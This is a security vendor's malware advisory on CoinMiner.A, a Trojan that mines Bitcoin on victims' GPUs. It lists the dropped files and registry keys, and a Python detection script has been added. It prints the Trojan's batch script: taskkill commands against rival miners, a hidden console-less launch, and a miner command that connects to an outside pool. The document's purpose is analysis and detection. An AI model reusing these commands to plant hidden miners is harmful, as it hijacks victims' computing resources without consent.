New GPU Bitcoin Miner Trojan spotted in the wild

October 6, 2011

The Sonicwall UTM research team received reports of a new Bitcoin Trojan in the wild. Bitcoin is a decentralized peer-to-peer crypto-currency. The process of generating (mining) bitcoins is computationally expensive, and generating a single bitcoin on a personal computer would take an impractical amount of time. If, however, an attacker were able to compromise a handful of machines with fast parallel Graphics Processing Units, it could turn into a very lucrative money-making business. CoinMiner.A is a Trojan that attempts to fulfill this purpose.

The Trojan uses the following icon:

The Trojan adds the following files to the filesystem:

  • C:\Documents and Settings\{USER}\Local Settings\Temp\acc\3kal.cmd
  • C:\Documents and Settings\{USER}\Local Settings\Temp\acc\hsbca.exe
  • C:\Documents and Settings\{USER}\Local Settings\Temp\acc\mamatije5.exe [Detected as GAV: CoinMiner.A_2 (Trojan)]
  • C:\Documents and Settings\{USER}\Start Menu\Programs\Startup\wuT2.exe [Detected as GAV: CoinMiner.A_3 (Trojan)]

hsbca.exe is non-malicious software from NTWind called Hidden Start. It is used to run batch files and other programs without a console window. It uses the following icon:

wuT2.exe uses the following icon:

3kal.cmd contains the following data:

      ping -n 40 google.com
      taskkill /f /im cgminer.exe
      taskkill /f /im svchoost.exe
      taskkill /f /im mamatije.exe
      taskkill /f /im mamatije2.exe
      taskkill /f /im mamatije3.exe
      taskkill /f /im yaaa3.2.exe
      taskkill /f /im WinMine.exe
      taskkill /f /im mamatije4.exe
      mamatije5.exe -a 59 -g no -o http://y.b{removed}.info:8332/ -u dxstr_miner -p hello -t 2

The Trojan adds the following keys to the Windows registry:

  • HKEY_CURRENT_USER\Software\WinRAR SFX  C:\Documents and Settings\{USER}\Start Menu\Programs\Startup  "C:\Documents and Settings\{USER}\Start Menu\Programs\Startup"
  • HKEY_CURRENT_USER\Software\WinRAR SFX  C:\Documents and Settings\{USER}\Local Settings\Temp\acc  "C:\Documents and Settings\{USER}\Local Settings\Temp\acc"

The Trojan attempts to open the following files:

  • C:\Documents and Settings\{USER}\Start menu\Programs\Startup\start.exe
  • C:\Documents and Settings\{USER}\Start Menu\Programs\Startup\hahahahaha.exe
  • C:\Documents and Settings\{USER}\Start Menu\Programs\Startup\wuT.exe
  • C:\Documents and Settings\{USER}\Start Menu\Programs\Startup\NoRisk.exe
  • C:\Documents and Settings\{USER}\Start Menu\Programs\Startup\NoRisk2.exe

The Trojan uses hsbca.exe (Hidden Start) to run "3kal.cmd" via the following command:

      C:\Documents and Settings\{USER}\Local Settings\Temp\acc\hsbca.exe "/NOCONSOLE C:\Documents and Settings\{USER}\Local Settings\Temp\acc\3kal.cmd"

The Trojan runs the following command to ensure internet connectivity:

  • ping -n 40 google.com

As defined in "3kal.cmd" the Trojan runs taskkill.exe in an attempt to kill the following programs if they are loaded:

  • cgminer.exe
  • svchoost.exe
  • mamatije.exe
  • mamatije2.exe
  • mamatije3.exe
  • yaaa3.2.exe
  • WinMine.exe
  • mamatije4.exe
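The dropped files, the Hidden Start launch, the taskkill loop and the miner command line above form one observable chain on an infected host. The following Python script, an added example that is not part of the SonicWALL advisory, turns those indicators into a small classifier for process-creation command lines: it flags a Hidden Start /NOCONSOLE launch of a batch file, a forced taskkill of any of the competing miners listed above, a pool-miner invocation shaped like the mamatije5.exe line (an -o pool URL together with -u worker and -p password, with the port 8332 used here), and direct execution of one of the dropped file names. The sample command lines, the user name alice and the pool host pool.example.invalid are constructed for the example and are not from the advisory.

```python
import re
from typing import Dict, List

# Indicators quoted in the advisory: dropped file names, the competing miners
# that 3kal.cmd tries to kill, and the pool port in the miner command line.
DROPPED_FILES = {"3kal.cmd", "hsbca.exe", "mamatije5.exe", "wut2.exe"}
KILLED_MINERS = {
    "cgminer.exe", "svchoost.exe", "mamatije.exe", "mamatije2.exe",
    "mamatije3.exe", "yaaa3.2.exe", "winmine.exe", "mamatije4.exe",
}
POOL_PORT = "8332"

TASKKILL_RE = re.compile(r"^\s*taskkill(?:\.exe)?\s+/f\s+/im\s+(\S+)", re.IGNORECASE)
# Hidden Start running a script without a console window, as in the advisory.
HIDDEN_START_RE = re.compile(r'hsbca\.exe\s+"?/NOCONSOLE\s+([^"]+)"?', re.IGNORECASE)
# Pool miner style arguments: -o http://host:port/ -u worker -p password
POOL_RE = re.compile(r"-o\s+https?://([^\s/:]+)(?::(\d+))?", re.IGNORECASE)
WORKER_RE = re.compile(r"-u\s+(\S+)")
PASS_RE = re.compile(r"-p\s+(\S+)")
QUOTED_RE = re.compile(r'^"([^"]+)"')
DRIVE_PATH_RE = re.compile(r"^([A-Za-z]:\\.*?\.(?:exe|cmd|bat))(?=\s|$)", re.IGNORECASE)

# Constructed sample process-creation command lines (not captured from the
# Trojan); the user name and pool host are placeholders.
SAMPLE_EVENTS = [
    r'C:\Documents and Settings\alice\Local Settings\Temp\acc\hsbca.exe "/NOCONSOLE C:\Documents and Settings\alice\Local Settings\Temp\acc\3kal.cmd"',
    "ping -n 40 google.com",
    "taskkill /f /im cgminer.exe",
    "taskkill /f /im WinMine.exe",
    "mamatije5.exe -a 59 -g no -o http://pool.example.invalid:8332/ -u dxstr_miner -p hello -t 2",
    r"C:\WINDOWS\notepad.exe C:\notes.txt",
]


def executable_name(cmd: str) -> str:
    """Lower-cased file name of the program a command line starts with.

    Handles a quoted path, an unquoted drive path containing spaces (stops at
    the first .exe/.cmd/.bat extension), or a bare first token.
    """
    text = cmd.strip()
    if not text:
        return ""
    m = QUOTED_RE.match(text) or DRIVE_PATH_RE.match(text)
    head = m.group(1) if m else text.split()[0]
    return head.rsplit("\\", 1)[-1].lower()


def classify_command(cmd: str) -> Dict[str, str]:
    """Map one command line to a verdict plus the evidence that produced it."""
    m = TASKKILL_RE.match(cmd)
    if m and m.group(1).lower() in KILLED_MINERS:
        return {"verdict": "kill_competing_miner", "evidence": m.group(1)}
    m = HIDDEN_START_RE.search(cmd)
    if m:
        return {"verdict": "hidden_start_launch", "evidence": m.group(1).strip()}
    pool = POOL_RE.search(cmd)
    if pool and WORKER_RE.search(cmd) and PASS_RE.search(cmd):
        port = pool.group(2) or ""
        return {"verdict": "miner_launch", "evidence": f"{pool.group(1)}:{port}"}
    name = executable_name(cmd)
    if name in DROPPED_FILES:
        return {"verdict": "dropped_file_executed", "evidence": name}
    return {"verdict": "benign", "evidence": ""}


def scan_events(lines: List[str]) -> List[Dict[str, str]]:
    """Return only the suspicious command lines, each with its verdict."""
    findings = []
    for line in lines:
        result = classify_command(line)
        if result["verdict"] != "benign":
            findings.append({"line": line, **result})
    return findings


def summarize(lines: List[str]) -> Dict[str, int]:
    """Count command lines per verdict; useful as a quick triage view."""
    counts: Dict[str, int] = {}
    for line in lines:
        verdict = classify_command(line)["verdict"]
        counts[verdict] = counts.get(verdict, 0) + 1
    return counts


if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f"{f['verdict']:<24} {f['evidence']}")
    print(summarize(SAMPLE_EVENTS))
```

The ping is deliberately left as benign: on its own it carries no signal, and the chain is better recognised by the taskkill loop and the miner launch that follow it. A pool-miner launch on port 8332 is only as strong an indicator as the miner command line quoted above; a host running a miner legitimately would trip the same rule, so the verdicts are triage labels for an analyst rather than automatic blocks.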

Our analysis determined that the Trojan uses Nvidia CUDA to employ the GPU (if present) to generate bitcoins.

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: CoinMiner.A (Trojan)
  • GAV: CoinMiner.A_2 (Trojan)
  • GAV: CoinMiner.A_3 (Trojan)